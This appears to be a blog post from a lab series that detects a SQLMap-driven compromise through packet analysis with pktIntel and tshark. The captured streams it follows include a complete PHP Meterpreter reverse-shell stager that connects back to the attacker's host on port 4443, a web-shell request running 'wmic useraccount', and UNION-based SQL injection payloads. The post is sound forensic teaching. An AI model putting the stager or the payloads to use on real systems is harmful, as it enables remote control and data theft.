Continuing SQL Injection with SQLMap - Detection via Packet Analysis
By Securitynik on 2020-07-07 13:01:25
Now that we have concluded the log analysis and detected that our system has been compromised via the SQLMap exploitation lab, let's now see how the packets can help with detecting this activity. In the interest of time, let's use the "pktIntel" tool from GitHub to see if this IP is known as malicious.
Let's first clone the tool
kali@securtynik:/tmp$ git clone https://github.com/SecurityNik/pktIntel.git
Cloning into 'pktIntel'...
remote: Enumerating objects: 98, done.
remote: Counting objects: 100% (98/98), done.
remote: Compressing objects: 100% (94/94), done.
remote: Total 98 (delta 48), reused 10 (delta 1), pack-reused 0
Receiving objects: 100% (98/98), 7.49 MiB | 5.05 MiB/s, done.
Resolving deltas: 100% (48/48), done.
Now that we have cloned the repo, let's copy the pcap to our "/tmp" directory
kali@securtynik:/tmp$ cp ~/potentialCompromise/Suspect-Compromise/wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng .

kali@securtynik:/tmp$ ls wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng 
wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng
Execute the "pktIntel.py" script with a focus on IP addresses:
kali@securtynik:/tmp/pktIntel$ ./pktIntel.py --ip

--------------------------||--------------------------||
 pktIntel.py
 Tool used to perform threat intelligence against packet data
 Author: Nik Alleyne
 Author Blog: www.securitynik.com
--------------------------||--------------------------||
[*] Checking your permission ...
    I don't need root permissions to read PCAPS 
    However, if you have PCAPs created by root or other users
    You should instead run me with root permission via sudo
[*] Running as kali with UID 1000  

.........
[*] Removing duplicates from the downloaded IPs ...
[*] There are currently  [4553] unique suspicious IPs  downloaded!
[*] Reading PCAP files ...
     Looking for TCP packets where ONLY the SYN flag is set.
     Also looking at UDP and ICMP packets
     By looking at the SYN flag, we are assuming the the 3-way handshake has started

[*] Note I may take a while so work with me on this ...
[*] Comparing downloaded IPs with those in your PCAPs ...

----- 1 SUSPICIOUS IPs DETECTED --------- 
['10.0.0.107']   
[*] Writing IP information to: 
   [./ip_threat_intel_2020-04-25T10:[./ip_threat_intel_2020-06-29T14:28:59.txt|./IPv6_session_2020-06-29T14:28:59.txt|./IPv6_session_2020-06-29T14:28:59.txt]
[*] Reading PCAP File to extract session information: /tmp/wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng

[*] Closing the file ./ip_threat_intel_2020-06-29T14:28:59.txt
[*] Closing the file ./IPv4_session_2020-06-29T14:28:59.txt
[*] Closing the file ./IPv6_session_2020-06-29T14:28:59.txt
[*] Completed IP Threat Intelligence Lookup!
[*] Happy Hunting! ...
Looking at the "ip_threat_intel_2020-06-29T14:28:59.txt"
kali@securtynik:/tmp/pktIntel$ cat ./ip_threat_intel_2020-06-29T14:28:59.txt
IP Address              PCAP File 
10.0.0.107       /tmp/wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng
Looking at the "./IPv4_session_2020-06-29T14:28:59.txt"
kali@securtynik:/tmp/pktIntel$ cat ./IPv4_session_2020-06-29T14:28:59.txt | wc --lines
35105
Looks like there are over 35,000 lines in this file. Looking at a quick snapshot of the file:
kali@securtynik:/tmp/pktIntel$ cat ./IPv4_session_2020-06-29T14:28:59.txt
frame.number             frame.time              ip.src   tcp.srcport    ip.dst   tcp.dstport   frame.len  ip.len 
1284    Jun 24, 2020 15:28:13.977331000 EDT     10.0.0.107              10.0.0.255              60      44
1285    Jun 24, 2020 15:28:13.977712000 EDT     10.0.0.107              10.0.0.255              60      44
1288    Jun 24, 2020 15:28:13.990469000 EDT     10.0.0.107              10.0.0.255              60      44
1289    Jun 24, 2020 15:28:13.990929000 EDT     10.0.0.107              10.0.0.255              60      44
1490    Jun 24, 2020 15:32:57.736220000 EDT     10.0.0.107      42056   10.0.0.108      80      74      60
1491    Jun 24, 2020 15:32:57.736701000 EDT     10.0.0.108      80      10.0.0.107      42056   66      52
1492    Jun 24, 2020 15:32:57.738115000 EDT     10.0.0.107      42056   10.0.0.108      80      60      40
1493    Jun 24, 2020 15:32:57.740078000 EDT     10.0.0.107      42056   10.0.0.108      80      369     355
1494    Jun 24, 2020 15:32:57.783929000 EDT     10.0.0.108      80      10.0.0.107      42056   54      40
..........
This looks good but we need the information relating to port 4443 which we learned in the log analysis.
kali@securtynik:/tmp/pktIntel$ cat ./IPv4_session_2020-06-29T14:28:59.txt | grep --perl-regexp "\s+4443\s+" | more

37171   Jun 24, 2020 17:03:23.571105000 EDT     10.0.0.108      6375    10.0.0.107      4443    66      52
37172   Jun 24, 2020 17:03:23.573522000 EDT     10.0.0.107      4443    10.0.0.108      6375    66      52
37173   Jun 24, 2020 17:03:23.581008000 EDT     10.0.0.108      6375    10.0.0.107      4443    54      40
37174   Jun 24, 2020 17:03:23.613422000 EDT     10.0.0.107      4443    10.0.0.108      6375    60      44
37175   Jun 24, 2020 17:03:23.622029000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
37176   Jun 24, 2020 17:03:23.622033000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
37177   Jun 24, 2020 17:03:23.623175000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
37178   Jun 24, 2020 17:03:23.623792000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
37179   Jun 24, 2020 17:03:23.627904000 EDT     10.0.0.108      6375    10.0.0.107      4443    54      40
37180   Jun 24, 2020 17:03:23.628116000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
37181   Jun 24, 2020 17:03:23.628118000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
37182   Jun 24, 2020 17:03:23.629433000 EDT     10.0.0.107      4443    10.0.0.108      6375    1514    1500
.....
Let find the stream relating to this session.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "(ip.addr == 10.0.0.107) && (tcp.port==4443) && (ip.addr==10.0.0.108)" -T fields -e tcp.stream | sort | uniq --count | sort --numeric --reverse
   2320 2499
    138 2504
      6 2502
      6 2501
Looks like there are multiple sessions which might have used port "4443". Let's start off with following the stream with number "2499" and which has 2320 packets.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2499 | less
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2499
Node 0: 10.0.0.108:6375
Node 1: 10.0.0.107:4443
        4
....
        1460
/*<?php /**/

if (!isset($GLOBALS['channels'])) {
    $GLOBALS['channels'] = array();
}

if (!isset($GLOBALS['channel_process_map'])) {
    $GLOBALS['channel_process_map'] = array();
}


if (!isset($GLOBALS['resource_type_map'])) {
    $GLOBALS['resource_type_map'] = array();
}

....
my_print("Evaling main meterpreter stage");
...........
We get to see PHP code but then we see the traffic is encrypted and at this point, we are unable to see any more clear text.
D&/@D&/@D&/@D&/@D&/@D&/@D&-cD&/@D&/fD'/A'I]%.HJ'+RF!0Cp4(Pp%*E]94RF/*&/@D./AD$.wu..p|..xp..uu..wr..wp..r|..qq./@D'.@E$.mi..m.ch.
....jf.dmj.i..mi,b.^Mdf*.hm'/WG+-a.7tdn..`n..en.|gb.^Mdl'.en..g[9..y0.A`%.Jw0pU....%72qZ.(on7+\F..RBpkO.#)n}o.N...R|+.iiv&M~o2c{8 cC^M.nm#.|.).../..}Jo~L.rWX..BW-(.^p
D.$...6.U...mL.s..7.|X97RJ.uua/
kk#tqw.*N..0kE.NkU&&.k.<.^&.j.(.T..ktxp#U.^M..L9..l7rB}%.D..u..'6U.#}\v.#Qh/4qv2.,vr|lX*!.j.w.....^u'AN!v.c
>.h$..].+Jd./sn9.nur.V_v!ex.sW./.^Mx2.V%..g.&"VC..Rb00AF-smi..i.u*Q.&.VE/'Sv7"bgotgI6*\}!.A..<L.tsP[...cJoQf..wn.N..mi.j......jf.dmj.i..mi,/
423
=M............yEA.a.=M..=M.m=M..=M..=L..^"..b#..R9..I(..Q;..S...M9..SM..=d..=O...u...{...{...u...{...}...u...|..=M..?O..=M..=L..9O..H.C..^-?M.6...{:.{u
................... .....Lrj..{..z. .3...sr.N.5..39@..'bB.....R../..e....`..E..ND8.0F..k.2R.AC2...5.:.....>.........b........^M*.D".b$|{.,(...&..;S5....!......2..X.......N.8`...Z.\lYN....8...orhw.i .S!......L.....5H1Td...O."..E...@......=M..?M..=M..=M..9Lr......UL'..dy.7.
        128
G..Kt.k...Kv....;..|G..JG..#G..K.&.+.[o....P[.o+..gU.......CFY..4+6F_.E1`..4....u..o.}.k.8....#A..F......O..a.P2.iO..l......g.^M/
.........................
Lets' see what we can learn from the stream with number "2504"
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2504 | less

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2504
Node 0: 10.0.0.108:6444
Node 1: 10.0.0.107:4443
        4
....
        1460
/*<?php /**/
if (!isset($GLOBALS['channels'])) {
    $GLOBALS['channels'] = array();
}
At first glance, we can conclude the attacker connected multiple times with the PHP Meterpreter. Actually, we already know that there was multiple connection to this host. We know this because when we looked at the "IPv4_session_2020-06-29T14:28:59.txt", we saw multiple connection on port 4443. No need for us to continue along this path as we already have some insights what this communication looks like.
Looking at the stream numbers for for any sessions created between these hosts and we see:
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "(ip.addr == 10.0.0.107) && (ip.addr==10.0.0.108)" -T fields -e tcp.stream | sort | uniq --count | sort --numeric --reverse | more
   2320 2499
    138 2504
     79 1960
     57 27
     41 26
     40 25
     35 1346
     34 1499
     31 1652
     23 29
     22 884
     22 731
     22 578
     22 426
     22 2419

..................
Staying on track, when the log analysis was performed, we found the "server.php" file first returned "404 Not Found" and then it was "200 OK". Let's now run a filter for "server.php"
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -t ad -Y "http contains server.php"
37051 2020-06-24 17:01:17.910411   10.0.0.107 → 10.0.0.108   HTTP 420 GET /server.php HTTP/1.1 
37082 2020-06-24 17:01:39.806126   10.0.0.107 → 10.0.0.108   HTTP 820 POST /tmpuevkq.php HTTP/1.1  (application/x-php)
37170 2020-06-24 17:03:23.536168   10.0.0.107 → 10.0.0.108   HTTP 420 GET /server.php HTTP/1.1 
37207 2020-06-24 17:03:23.753345   10.0.0.107 → 10.0.0.108   HTTP 420 [TCP Spurious Retransmission] GET /server.php HTTP/1.1 
37425 2020-06-24 17:07:11.052736   10.0.0.107 → 10.0.0.108   HTTP 420 GET /server.php HTTP/1.1 
40372 2020-06-24 17:25:18.121161   10.0.0.107 → 10.0.0.108   HTTP 420 GET /server.php HTTP/1.1 
Above we can confirm the time matches with our log analysis for "GET /server.php". We already know in frame "3705"1 this request failed so I won't go deeper into it at this time. However, as we look at frame "37082", we can conclude since this is a "POST" this is more than likely where the file was uploaded as we know after that and from the log analysis, the frame with number "37425" corresponds with the time the request was successful based on the data from our log analysis.. Let's confirm this.
Let's first find the stream number of:
kali@securtynik:/tmp$ tshark -n -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -t ad -Y "frame.number == 37082" -T fields -e tcp.stream
2497
Now that we know the stream number, let's follow it to see inside the payload:
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2497

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2497
Node 0: 10.0.0.107:47006
Node 1: 10.0.0.108:80
1460
POST /tmpuevkq.php HTTP/1.1
Host: 10.0.0.108
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.108/tmpuevkq.php
Content-Type: multipart/form-data; boundary=---------------------------16439358805639454101277827
Content-Length: 1695
Connection: keep-alive
Cookie: PHPSESSID=mtacgh4674o18jbbc80mp31vki
Upgrade-Insecure-Requests: 1

-----------------------------16439358805639454101277827
Content-Disposition: form-data; name="MAX_FILE_SIZE"

1000000000
-----------------------------16439358805639454101277827
Content-Disposition: form-data; name="file"; filename="server.php"
Content-Type: application/x-php

<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$le
766
n) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

-----------------------------16439358805639454101277827
Content-Disposition: form-data; name="uploadDir"

\xampp\htdocs\
-----------------------------16439358805639454101277827
Content-Disposition: form-data; name="upload"

upload
-----------------------------16439358805639454101277827--

        277
HTTP/1.1 200 OK
Date: Wed, 24 Jun 2020 21:01:39 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 24
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

admin.adminFile uploaded
===================================================================
Now that we know the file was uploaded, let's look at the packet with frame number "37425" to see what occurred. Once again, let's find the stream number.
kali@securtynik:/tmp$ tshark -n -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -t ad -Y "frame.number == 37425" -T fields -e tcp.stream
2500
Looking at the payload.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2500

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2500
Node 0: 10.0.0.107:47010
Node 1: 10.0.0.108:80
366
GET /server.php HTTP/1.1
Host: 10.0.0.108
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=mtacgh4674o18jbbc80mp31vki
Upgrade-Insecure-Requests: 1


        261
HTTP/1.1 200 OK
Date: Wed, 24 Jun 2020 21:07:11 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 9
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

no socket
===================================================================
Looks like with this "200 OK" no socket was created. Maybe this was because the attacker did not properly set up his system to receive the connection for port "4443" which we learned about above. Let's confirm that the host was not listening on that part and thus sends back a Reset/Ack message.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "tcp.srcport == 4443 && tcp.flags.reset == 1"
37427 7129.654749   10.0.0.107 → 10.0.0.108   TCP 60 4443 → 6387 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
37430 7130.243023   10.0.0.107 → 10.0.0.108   TCP 60 4443 → 6387 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
37432 7130.951952   10.0.0.107 → 10.0.0.108   TCP 60 4443 → 6387 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
37434 7130.968125   10.0.0.107 → 10.0.0.108   TCP 60 4443 → 6388 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
37436 7131.559826   10.0.0.107 → 10.0.0.108   TCP 60 4443 → 6388 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
37438 7132.162256   10.0.0.107 → 10.0.0.108   TCP 60 4443 → 6388 [RST, ACK] Seq=1 Ack=1 Win=0 Len=0
We are beginning to tie everything together even activities relating to the threat actor's mistakes. Matters not that those mistakes were made, the reality is our environeent was still compromised by a web vulnerability.
Let's dig a bit more. We learned from the log analysis that the WMIC command was run. Let's confirm the data which was returned.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "http contains wmic"
34590 2766.899183   10.0.0.107 → 10.0.0.108   HTTP 321 GET /tmpbfkst.php?cmd=wmic%20useraccount HTTP/1.1 
Finding the stream number and following the stream.
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -Y "frame.number == 34590" -T fields -e tcp.stream
2476


kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,2476

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 2476
Node 0: 10.0.0.107:46964
Node 1: 10.0.0.108:80
267
GET /tmpbfkst.php?cmd=wmic%20useraccount HTTP/1.1
Cache-Control: no-cache
Cookie: security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0
User-Agent: Opera/9.23 (Windows NT 5.1; U; da)
Host: 10.0.0.108
Accept: */*
Accept-Encoding: gzip,deflate
Connection: close


        1460
HTTP/1.1 200 OK
Date: Wed, 24 Jun 2020 19:54:28 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
Content-Length: 2548
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>AccountType  Caption                             Description                                                                                      Disabled  Domain           FullName  InstallDate  LocalAccount  Lockout  Name                PasswordChangeable  PasswordExpires  PasswordRequired  SID                                           SIDType  Status    
512          SECURITYNIK-WIN\Administrator       Built-in account for administering the computer/domain                                           FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Administrator       TRUE                FALSE            TRUE              S-1-5-21-3846991316-327138358-508696823-500   1        OK        
512          SECURITYNIK-WIN\DefaultAccount      A user account managed by the system.                                                            TRUE      SECURITYNIK-WIN                         TRUE          FALSE    DefaultAccount      TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-503   1        Degraded  
512          SECURITYNIK-WIN\Guest               Built-in account for guest access to the computer/domain                                         TRUE 
        1306
     SECURITYNIK-WIN                         TRUE          FALSE    Guest               FALSE               FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-501   1        Degraded  
512          SECURITYNIK-WIN\SecurityNik                                                                                                          FALSE     SECURITYNIK-WIN                         TRUE          FALSE    SecurityNik         TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-1002  1        OK        
512          SECURITYNIK-WIN\Toronto                                                                                                              FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Toronto             TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-1005  1        OK        
512          SECURITYNIK-WIN\WDAGUtilityAccount  A user account managed and used by the system for Windows Defender Application Guard scenarios.  TRUE      SECURITYNIK-WIN                         TRUE          FALSE    WDAGUtilityAccount  TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-504   1        Degraded  

</pre>
===================================================================
Similarly, we can look into the clear-text packets to see the queries which were run. Let's pick on the stream number with "1346"
kali@securtynik:/tmp$ tshark -r wireshark_9379FBF3-1886-44B4-92A2-EA9FB4071316_20200624150819_a05412.pcapng -q -z follow,tcp,ascii,1346

===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 1346
Node 0: 10.0.0.107:44704
Node 1: 10.0.0.108:80
435
POST /dvwa/vulnerabilities/sqli/ HTTP/1.1
Content-Length: 271
Cache-Control: no-cache
Cookie: security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.86 Safari/533.4
Host: 10.0.0.108
Accept: */*
Accept-Encoding: gzip,deflate
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close


271
id=1%27%20UNION%20ALL%20SELECT%20CONCAT%280x716a7a7a71%2CIFNULL%28CAST%28grantee%20AS%20NCHAR%29%2C0x20%29%2C0x6a7461727468%2CIFNULL%28CAST%28privilege_type%20AS%20NCHAR%29%2C0x20%29%2C0x7170767071%29%2CNULL%20FROM%20INFORMATION_SCHEMA.USER_PRIVILEGES%23&Submit=Submit%23

       1460
HTTP/1.1 200 OK
Date: Wed, 24 Jun 2020 19:44:52 GMT
Server: Apache/2.4.29 (Win32) OpenSSL/1.1.0g PHP/7.2.1
X-Powered-By: PHP/7.2.1
........
Above we see the query which can be found in the parameter "id". We can use a URL Decoder as we did in the log analysis post and convert this to a more human readable string such as:
id=1' UNION ALL SELECT NULL,CONCAT(0x7176786b71,IFNULL(CAST(grantee AS NCHAR),0x20),0x756d76677a67,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x716a6b6b71) FROM INFORMATION_SCHEMA.USER_PRIVILEGES#&Submit=Submit#
Anove we see attempts to read information on the user privileges.
If we look deeper into this same session after following the stream, we see a snapshot below of what was returned, we can see below the user 'root'@'localhost' seems to be in use. Additionally, we see privileges such as "UPDATE", "DELETE", "CREATE".
 1460
7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthSELECTqpvpq<br />Sur
name: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(
privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthINSERTqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthUPDATEqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: jzzq'root'@'localhost'jtarthDELETEqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),
0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#<br />First name: qjzzq'root'@'localhost'jtarthCREATEqpvpq<br />Surname: </pre><pre>ID: 1' UNION ALL SELECT CONCAT(0x716a7a7a71,IFNULL(CAST(grantee AS NCHAR),0x20),0x6a7461727468,IFNULL(CAST(privilege_type AS NCHAR),0x20),0x7170767071),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGE
Ok at this point, you should have a good understanding of some of the things you can do to detect SQL injection via SQLMap in your environment.
Looking for additional guidance on packet or log analysis? Come hangout with us at one of the upcoming SEC503 Intrusion Detection in Depth class or the soon to be released SEC582 - Mastering TShark Packet Analysis. Additionally, you can grab a copy of Hack and Detect or Mastering TShark Network Forensics.
P.S. Not sure if you noticed it but I would have had to add the private IP address "10.0.0.107" to the script for it to show up. However, the concepts remain the same.
References:
pktIntel: Tool used to perform threat intelligence against packet data